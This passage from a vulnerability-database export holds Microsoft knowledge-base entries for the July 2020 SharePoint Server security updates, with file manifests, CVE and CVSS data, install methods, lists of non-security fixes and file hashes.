04:17 \nv2vpblyprovfil.xml| provisionedfiles.xml| | 1,933| 11-Sep-2018| 02:06 \nv3dwpcontactfield_dwp| contactwp.dwp| | 544| 07-Sep-2018| 04:17 \nv3dwpcontactlinks_dwp| contactlinks.dwp| | 556| 07-Sep-2018| 04:17 \nv3dwpcrwp_dwp| categoryresultswebpart.webpart| | 13,390| 07-Sep-2018| 04:17 \nv3dwpcwp_dwp| categorywebpart.webpart| | 908| 07-Sep-2018| 04:17 \nv3dwpmemberships_dwp| memberships.dwp| | 833| 07-Sep-2018| 04:17 \nv3dwpmydocs_dwp| mydocs.dwp| | 757| 07-Sep-2018| 04:17 \nv3dwpmyworks_dwp| myworks.dwp| | 533| 07-Sep-2018| 04:17 \nv3dwpowacalendar_dwp| owacalendar.dwp| | 534| 07-Sep-2018| 04:17 \nv3dwpowacontacts_dwp| owacontacts.dwp| | 534| 07-Sep-2018| 04:17 \nv3dwpowainbox_dwp| owainbox.dwp| | 550| 07-Sep-2018| 04:17 \nv3dwpowatasks_dwp| owatasks.dwp| | 525| 07-Sep-2018| 04:17 \nv3dwpowa_dwp| owa.dwp| | 510| 07-Sep-2018| 04:17 \nv3dwppplsbwp_dwp| peoplesearchbox.dwp| | 1,711| 07-Sep-2018| 04:17 \nv3dwpprofilebrowser_dwp| profilebrowser.dwp| | 644| 07-Sep-2018| 04:17 \nv3dwpquicklinks_dwp| quicklinks.dwp| | 526| 07-Sep-2018| 04:17 \nv3dwpsiteframer_dwp| siteframer.dwp| | 909| 07-Sep-2018| 04:17 \nv3dwpsocialcomment_dwp| socialcomment.dwp| | 579| 07-Sep-2018| 04:17 \nv3dwptagcloud_dwp| tagcloud.dwp| | 562| 07-Sep-2018| 04:17 \nv3dwpthisweekinpicsdwp_dwp| thisweekinpictures.dwp| | 456| 07-Sep-2018| 04:17 \nv3dwptopsiteswp_dwp| topsiteswebpart.webpart| | 1,569| 07-Sep-2018| 04:17 \nv3newshomelayout.aspx| newshomelayout.aspx| | 5,842| 07-Sep-2018| 04:17 \nv3rootportalhomelayout_aspx| defaultlayout.aspx| | 6,446| 07-Sep-2018| 04:17 \nv3rootportalhome_aspx| default.aspx| | 284| 07-Sep-2018| 04:17 \nv3tabviewpage.aspx| tabviewpage.aspx| | 286| 07-Sep-2018| 04:17 \nv3tabviewpagelyt.aspx| tabviewpagelayout.aspx| | 4,912| 07-Sep-2018| 04:17 \nv3xmlonet_xml| onet.xml| | 18,019| 07-Sep-2018| 04:17 \nvalues.sql.62b8ceef_1020_4520_8b7c_a5a4c498eb66| values.sql| | 240,048| 11-Sep-2018| 05:22 \nvarex.asx| variationexport.aspx| | 266| 07-Sep-2018| 11:41 \nvarim.asx| variationimport.aspx| | 7,551| 07-Sep-2018| 11:41 \nvarlabmenu.asx| variationslabelmenu.ascx| | 460| 07-Sep-2018| 11:41 \nvarlbl.asx| variationlabel.aspx| | 14,871| 07-Sep-2018| 11:41 \nvarlbls.asx| variationlabels.aspx| | 11,080| 07-Sep-2018| 11:41 \nvarlogs.asx| variationlogs.aspx| | 9,193| 07-Sep-2018| 11:41 \nvarroot.asx| variationsrootlanding.ascx| | 8,190| 07-Sep-2018| 11:41 \nvarset.asx| variationsettings.aspx| | 14,174| 07-Sep-2018| 11:41 \nvbcdextensioncallbasedscript.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| vbcdextensioncallbasedscript.xml| | 1,646| 07-Sep-2018| 03:39 \nvbcdextensionfilebasedscript.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| vbcdextensionfilebasedscript.xml| | 1,145| 07-Sep-2018| 03:39 \nvbmaobjectscript.xml.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| vbmaobjectscript.xml| | 2,598| 07-Sep-2018| 03:39 \nvbmvobjectscript.xml.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| vbmvobjectscript.xml| | 943| 07-Sep-2018| 03:39 \nvbpasswordextensionscript.xm.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| vbpasswordextensionscript.xml| | 1,937| 07-Sep-2018| 03:39 \nvbwmirunscript.xml.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| vbwmirunscript.xml| | 1,009| 07-Sep-2018| 03:39 \nvsprojectcs.xsl.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| vsprojectcs.xsl| | 4,725| 07-Sep-2018| 03:39 \nvsprojectvb.xsl.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| vsprojectvb.xsl| | 4,996| 07-Sep-2018| 03:39 \nvwscope1.apx| viewscopes.aspx| | 13,825| 07-Sep-2018| 04:12 \nvwscopes.apx| viewscopes.aspx| | 22,951| 07-Sep-2018| 04:12 \nvwscpse1.apx| viewscopesettings.aspx| | 13,328| 07-Sep-2018| 04:12 \nvwscpset.apx| viewscopesettings.aspx| | 8,050| 07-Sep-2018| 04:12 \nwarning.asx| warning.aspx| | 3,942| 07-Sep-2018| 03:57 \nwebconfig.extended.search.xml| webconfig.extended.search.xml| | 538| 07-Sep-2018| 04:12 \nwebconfig.mosschart.xml_481077871| webconfig.mosschart.xml| | 400| 07-Sep-2018| 03:32 \nwebconfig.sps.xml| webconfig.sps.xml| | 18,266| 07-Sep-2018| 04:17 \nwebfldr.asx_multilang| webfldr.aspx| | 2,590| 11-Sep-2018| 02:11 \nwebtaggingdialog.js| webtaggingdialog.js| | 17,313| 11-Sep-2018| 06:14 \nwebtaggingtialog.apx| webtaggingdialog.aspx| | 5,484| 11-Sep-2018| 06:14 \nwelcomelayout2.aspx| welcomelayout2.aspx| | 4,170| 07-Sep-2018| 04:17 \nwizardconnecttodata.aspx_2060739507| wizardconnecttodata.aspx| | 8,027| 07-Sep-2018| 03:32 \nwizardconnecttodatastep1.ascx_2060739507| wizardconnecttodatastep1.ascx| | 4,360| 07-Sep-2018| 03:32 \nwizardconnecttodatastep2.ascx_2060739507| wizardconnecttodatastep2.ascx| | 13,155| 07-Sep-2018| 03:32 \nwizardconnecttodatastep3.ascx_2060739507| wizardconnecttodatastep3.ascx| | 14,012| 07-Sep-2018| 03:32 \nwizardconnecttodatastep4.ascx_2060739507| wizardconnecttodatastep4.ascx| | 2,393| 07-Sep-2018| 03:32 \nwizardcustomizechart.aspx_2060739507| wizardcustomizechart.aspx| | 7,523| 07-Sep-2018| 03:32 \nwizardcustomizechartstep1.ascx_2060739507| wizardcustomizechartstep1.ascx| | 5,979| 07-Sep-2018| 03:32 \nwizardcustomizechartstep2.ascx_2060739507| wizardcustomizechartstep2.ascx| | 5,239| 07-Sep-2018| 03:32 \nwizardcustomizechartstep3.ascx_2060739507| wizardcustomizechartstep3.ascx| | 9,027| 07-Sep-2018| 03:32 \nwizardlist.aspx_2060739507| wizardlist.aspx| | 4,437| 07-Sep-2018| 03:32 \nwlcmlnk.apx| welcomelinks.aspx| | 7,674| 07-Sep-2018| 11:41 \nwlcmspl.xml| welcomesplash.aspx| | 7,873| 07-Sep-2018| 11:41 \nwlcmtoc.xml| welcometoc.aspx| | 6,953| 07-Sep-2018| 11:41 \nwmirunscript.xml.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| wmirunscript.xml| | 1,493| 07-Sep-2018| 03:39 \nworkflowdisco.aspx| workflowdisco.aspx| | 1,311| 07-Sep-2018| 11:45 \nworkflowwsdl.aspx| workflowwsdl.aspx| | 16,806| 07-Sep-2018| 11:45 \nwrktaskip.aspx| wrktaskip.aspx| | 3,929| 11-Sep-2018| 02:11 \nwsrpmp.aspx| wsrpmarkupproxy.aspx| | 241| 07-Sep-2018| 04:17 \nwsrp_dwp| wsrpconsumerwebpart.dwp| | 457| 07-Sep-2018| 04:17 \nxlatewfassoc.aspx| xlatewfassoc.aspx| | 9,567| 11-Sep-2018| 02:11 \nxmlmapropertypages.dll.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| xmlmapropertypages.dll| 4.0.2450.49| 383,608| 11-Sep-2018| 05:22 \nxslappst.asc| xslapplicatorsettings.ascx| | 3,048| 07-Sep-2018| 11:41 \n \nInformation about protection and securityProtect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151>)Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-07-14T07:00:00", "type": "mskb", "title": "Description of the security update for SharePoint Server 2010: July 14, 2020", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1147", "CVE-2020-1450", "CVE-2020-1451", "CVE-2020-1456"], "modified": "2020-07-14T07:00:00", "id": "KB4484460", "href": "https://support.microsoft.com/en-us/help/4484460", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-24T11:21:19", "description": "None\n## Summary\n\nThis security update resolves vulnerabilities in Microsoft Office that could allow remote code execution if a user opens a specially crafted Office file. To learn more about these vulnerabilities, see the following security advisories:\n\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-1147](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1147>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-1439](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1439>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-1450](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1450>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-1451](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1451>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-1456](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1456>)\n**Note** To apply this security update, you must have the release version of [Service Pack 1 for Microsoft SharePoint Server 2013](<http://support.microsoft.com/kb/2880552>) installed on the computer.\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see [Windows Update: FAQ](<https://support.microsoft.com/en-us/help/12373/windows-update-faq>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB4484443>) website.\n\n### Method 3: Microsoft Download Center\n\nYou can get the standalone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.\n\n * [Download security update 4484443 for the 64-bit version of SharePoint Server 2013](<http://www.microsoft.com/download/details.aspx?familyid=b7b48aa3-7d66-48a1-8b0a-f665724e7d5a>)\n\n## More information\n\n### Security update deployment information\n\nFor deployment information about this update, see [security update deployment information: July 14, 2020](<https://support.microsoft.com/en-us/help/20200714>).\n\n### Security update replacement information\n\nThis security update replaces previously released security update [4484405](<http://support.microsoft.com/kb/4484405>).\n\n### File hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \ncoreserverloc2013-kb4484443-fullfile-x64-glb.exe| 04B7DF6C4DE1BB59C9A4D67B4BE28E7F35F80754| 56027DB80B279E1FDDA121A28D2CB09EEFDF7D686D7EB83EA02309178AE92380 \n \nFile informationDownload [the list of files that are included in security update 4484443](<https://download.microsoft.com/download/6/7/2/6724e406-0e57-49ce-a4e5-fd62d6fec0be/4484443.csv>).\n\n## Information about protection and security\n\nProtect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151>)Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-14T07:00:00", "type": "mskb", "title": "Description of the security update for SharePoint Enterprise Server 2013: July 14, 2020", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1147", "CVE-2020-1439", "CVE-2020-1450", "CVE-2020-1451", "CVE-2020-1456"], "modified": "2020-07-14T07:00:00", "id": "KB4484443", "href": "https://support.microsoft.com/en-us/help/4484443", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-15T10:30:10", "description": "None\n**Note: **After you install this update, the default setting for a trusted data source and trusted content locations in PerformancePoint Services will change from **trust all** to **trust none**. For more information, see [KB 4571413](<https://support.microsoft.com/help/4571413>).\n\n## Summary\n\nThis security update resolves vulnerabilities in Microsoft Office that could allow remote code execution if a user opens a specially crafted Office file. To learn more about these vulnerabilities, see the following security advisories:\n\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-1025](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1025>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-1147](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1147>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-1342](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1342>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-1439](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1439>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-1443](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1443>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-1444](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1444>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-1445](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1445>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-1446](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1446>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-1448](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1448>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-1450](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1450>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-1451](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1451>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-1454](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1454>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-1456](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1456>)\n**Note** To apply this security update, you must have the release version of Microsoft SharePoint Enterprise Server 2016 installed on the computer.This public update delivers Feature Pack 2 for SharePoint Server 2016. Feature Pack 2 contains the following feature:\n\n * SharePoint Framework (SPFx)\nThis public update also delivers all the features that were included in Feature Pack 1 for SharePoint Server 2016, including:\n * Administrative Actions Logging\n * MinRole enhancements\n * SharePoint Custom Tiles\n * Hybrid Taxonomy\n * OneDrive API for SharePoint on-premises\n * OneDrive for Business modern user experience (available to Software Assurance customers)\nThe OneDrive for Business modern user experience requires an active Software Assurance contract at the time that the experience is enabled, either by installation of the public update or by manual enablement. If you don't have an active Software Assurance contract at the time of enablement, you must turn off the OneDrive for Business modern user experience.For more information, see the following articles:\n * [New features included in the November 2016 Public Update for SharePoint Server 2016 (Feature Pack 1)](<https://go.microsoft.com/fwlink/?linkid=832679>)\n * [New features included in the September 2017 Public Update for SharePoint Server 2016 (Feature Pack 2)](<https://go.microsoft.com/fwlink/?linkid=856819>)\n\n## Improvements and fixes\n\nThis security update contains fixes for the following nonsecurity issues in SharePoint Server 2016:\n\n * The Automatic Password Change Schedule (Monthly by Day mode) doesn't work correctly.\n * Office document versions are getting trimmed when preservation hold is enabled.\n * Fixes incorrect regional settings of the Istanbul time zone. \n \n**Note** To fix this issue completely, you have to install [KB 4484440](<https://support.microsoft.com/help/4484440>) together with this update.\n * [Restore-SPEnterpriseSearchServiceApplication](<https://docs.microsoft.com/powershell/module/sharepoint-server/restore-spenterprisesearchserviceapplication?view=sharepoint-ps>) fails when SQL Server Authentication is used.\n * A memory leak occurs that could cause memory bottlenecks and performance issues on web front-end (WFE) servers if there are thousands of site collections across the farm.\n * A running timer job is orphaned when its server is removed.\n * In a site that contains the ampersand (&amp;) character in its URL, when you export a survey list to an Excel spreadsheet, Excel should open a new workbook that contains one worksheet that is named _owssvr_. However, the owssvr worksheet isn't opened.\nThis security update contains fixes for the following nonsecurity issues in Project Server 2016:\n * When you use either the Google Chrome or Microsoft Edge Chromium browser, even if you select **Cancel** in the Edit Resource or in Enterprise Custom Fields and Lookup Tables pages, the resource, enterprise field or lookup table remains checked out. For this fix to work, you have to install Chrome or Chromium browser version 81 or later.\n * When you use either the Google Chrome or Microsoft Edge Chromium browser, if you change a **View** setting such as a column width or order, the changes do not persist if the view, filter, or grouping is applied to pages such as the Project Center, Resource Center, Approvals, Tasks, or Timesheets. For example, after you chang **View** from **Summary** to **Cost**, and then you refresh the page, the **View** value remains as **Summary**. For this fix to work, you have to install the Chrome or Chromium browser version 81 or later.\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see [Windows Update: FAQ](<https://support.microsoft.com/en-us/help/12373/windows-update-faq>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB4484436>) website.\n\n### Method 3: Microsoft Download Center\n\nYou can get the standalone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.\n\n * [Download security update 4484436 for the 64-bit version of SharePoint Enterprise Server 2016](<http://www.microsoft.com/download/details.aspx?familyid=f232400f-0b93-444c-804d-a8b87bdad0ee>)\n\n## More Information\n\n### Security update deployment information\n\nFor deployment information about this update, see [security update deployment information: July 14, 2020](<https://support.microsoft.com/en-us/help/20200714>).\n\n### Security update replacement information\n\nThis security update replaces previously released security update [4484402](<http://support.microsoft.com/kb/4484402>).\n\n### File hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nsts2016-kb4484436-fullfile-x64-glb.exe| 05496ECF1F0F71CB03A330B17ACB5B9E0B1D5738| A63FC8F5EEC84CBE0DC1B81B7059F77DD0191ABA2EDE1AFE0B24A4FEC9DEAEBD \n \nFile informationDownload [the list of files that are included in security update 4484436](<https://download.microsoft.com/download/2/a/3/2a3952bf-fff8-41b5-818a-3cd38a261ca3/4484436.csv>).\n\n## Information about protection and security\n\nProtect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151>)Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-14T07:00:00", "type": "mskb", "title": "Description of the security update for SharePoint Enterprise Server 2016: July 14, 2020", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1025", "CVE-2020-1147", "CVE-2020-1342", "CVE-2020-1439", "CVE-2020-1443", "CVE-2020-1444", "CVE-2020-1445", "CVE-2020-1446", "CVE-2020-1448", "CVE-2020-1450", "CVE-2020-1451", "CVE-2020-1454", "CVE-2020-1456"], "modified": "2020-07-14T07:00:00", "id": "KB4484436", "href": "https://support.microsoft.com/en-us/help/4484436", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-15T10:30:16", "description": "None\n**Note: **After you install this update, the default setting for a trusted data source and trusted content locations in PerformancePoint Services will change from **trust all** to **trust none**. For more information, see [KB 4571413](<https://support.microsoft.com/help/4571413>).\n\n## Summary\n\nThis security update resolves vulnerabilities in Microsoft Office that could allow remote code execution if a user opens a specially crafted Office file. To learn more about these vulnerabilities, see the following security advisories:\n\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-1025](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1025>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-1147](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1147>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-1342](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1342>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-1439](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1439>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-1443](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1443>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-1444](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1444>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-1445](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1445>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-1446](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1446>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-1447](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1447>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-1448](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1448>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-1450](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1450>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-1451](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1451>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-1454](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1454>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2020-1456](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1456>)\n**Note** To apply this security update, you must have the release version of Microsoft SharePoint Server 2019 installed on the computer.\n\n## Improvements and fixes\n\nThis security update contains improvements and fixes for the following nonsecurity issues in SharePoint Server 2019:\n\n * The accessibility experience of the SharePoint App Launcher is improved for better integration with assistive technologies.\n * \"The Unattended Service Account Application ID is not specified or has an invalid value\" health rule does not work in a multi-server farm topology that uses MinRole server roles. This update fixes this issue.\n * You get different search results when you search for the plural and singular forms of the same word in German.\n * Images in a .vsdx file aren't displayed when the file is opened in a browser by using Visio Services.\n * Office document versions are getting trimmed when preservation hold is enabled.\n * Fixes an error that occurs when you select the **Sync** button in the classic document library web part.\n * Fixes a memory leak problem that could cause memory bottlenecks and performance issues on web front-end (WFE) servers if there are thousands of site collections across the farm.\n * Required Accessible Rich Internet Applications (ARIA)-level attributes are not provided for the SharePoint site Brand bar.\n * Focus is moved to the first input box when you activate **Invite people** and **Shared with** in the **Share **dialog box.\n * Users who are granted permissions to a SharePoint site through a security group cannot complete a SharePoint 2013 workflow.\n * Users receive an \"access denied\" message when they set **Manage User Permissions** in the User Profile Service Application.\n * Users cannot do machine translation with SharePoint Server 2019 because of the following error: \"The service application required to complete this request is unavailable.\"\nThis security update also contains improvements and fixes in SharePoint Server 2019. To enable these improvements and fixes, you have to install [KB 4484452](<https://support.microsoft.com/help/4484452>) together with this update.\n\n * The accessibility experience of the SharePoint Search ICON button is improved for better integration with assistive technologies.\n * The accessibility experience of the SharePoint Command Bar is improved for better integration with assistive technologies.\n * Query suggestions aren\u2019t shown in non-default zone web application.\n * Different SharePoint Framework apps show the same name in the modern site contents page in the app catalog site.\n * Tooltips are not accessible to keyboards for various controls that appear when users create a news post.\n * Alt attributes are missing in the Sharepoint.aspx site.\n * The program does not navigate the second level \"group by\" in document views.\n * The program does not open lookup fields in modern list web parts.\n * The program does not create list items from modern Personal sites.\n * The modern OneDrive page does not show the folder icon when you change to tiles view if the server isn\u2019t connected to the internet.\n * Query suggestions aren't shown in non-default zone web application.\nThis security update contains improvements and fixes for the following nonsecurity issues in Project Server 2019:\n * It is now possible to update task custom field values through the REST API.\n * Editing a project in Project Web App or approving status updates uses the Project Calculation Service (PCS). In some situations, PCS crashes when it closes a project. The crash details as seen when viewed in the Unified Logging Service (ULS) log (or in the Windows event logs) resembles the following: \n \n\"The worker encountered a very serious error and will shutdown. Exception code was: 0xc0000005 (EXCEPTION_ACCESS_VIOLATION).\"\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see [Windows Update: FAQ](<https://support.microsoft.com/en-us/help/12373/windows-update-faq>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB4484453>) website.\n\n### Method 3: Microsoft Download Center\n\nYou can get the standalone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.\n\n * [Download security update 4484453 for the 64-bit version of SharePoint Server 2019](<http://www.microsoft.com/download/details.aspx?familyid=f19e809b-213a-4915-a441-00c66ef9678a>)\n\n## More information\n\n### Security update deployment information\n\nFor deployment information about this update, see [security update deployment information: July 14, 2020](<https://support.microsoft.com/en-us/help/20200714>).\n\n### Security update replacement information\n\nThis security update replaces previously released security update [4484400](<http://support.microsoft.com/kb/4484400>).\n\n### File hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nsts2019-kb4484453-fullfile-x64-glb.exe| 574BEB99EC68EF5F11F5A5B9C3D6CBCDDF339F08| 511D2153BE0E8924767AB5FB2C8665DE591A57B30D5E23013A3F1A15E3A778FB \n \nFile informationThe English (United States) version of this software update installs files that have the attributes that are listed in the following table. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.\n\n## \n\n__\n\nFor all supported x64-based versions of SharePoint Server 2019\n\nFile identifier| File name| File version| File size| Date| Time \n---|---|---|---|---|--- \nmicrosoft.office.access.services.moss.dll| microsoft.office.access.services.moss.dll| 16.0.10363.12107| 767896| 7-Jul-20| 11:27 \nascalc.dll| ascalc.dll| 16.0.10363.12107| 972208| 7-Jul-20| 11:20 \nmicrosoft.office.access.server.application.dll| microsoft.office.access.server.application.dll| 16.0.10363.12107| 608680| 7-Jul-20| 11:21 \nmicrosoft.office.access.server.dll| microsoft.office.access.server.dll| 16.0.10363.12107| 1410488| 7-Jul-20| 11:22 \naccsrv.layouts.root.accsrvscripts.js| accessserverscripts.js| | 575536| 7-Jul-20| 11:21 \nconversion.chartserver.dll| chartserver.dll| 16.0.10363.12107| 16148384| 7-Jul-20| 11:26 \nppt.conversion.chartserver.dll| chartserver.dll| 16.0.10363.12107| 16148384| | \nppt.edit.chartserver.dll| chartserver.dll| 16.0.10363.12107| 16148384| | \nwac.office.chartserver.dll| chartserver.dll| 16.0.10363.12107| 16148384| | \nprodfeat.xml| feature.xml| | 616| 5-Jul-20| 09:42 \nastcmmn_js| assetcommon.js| | 18255| 7-Jul-20| 11:27 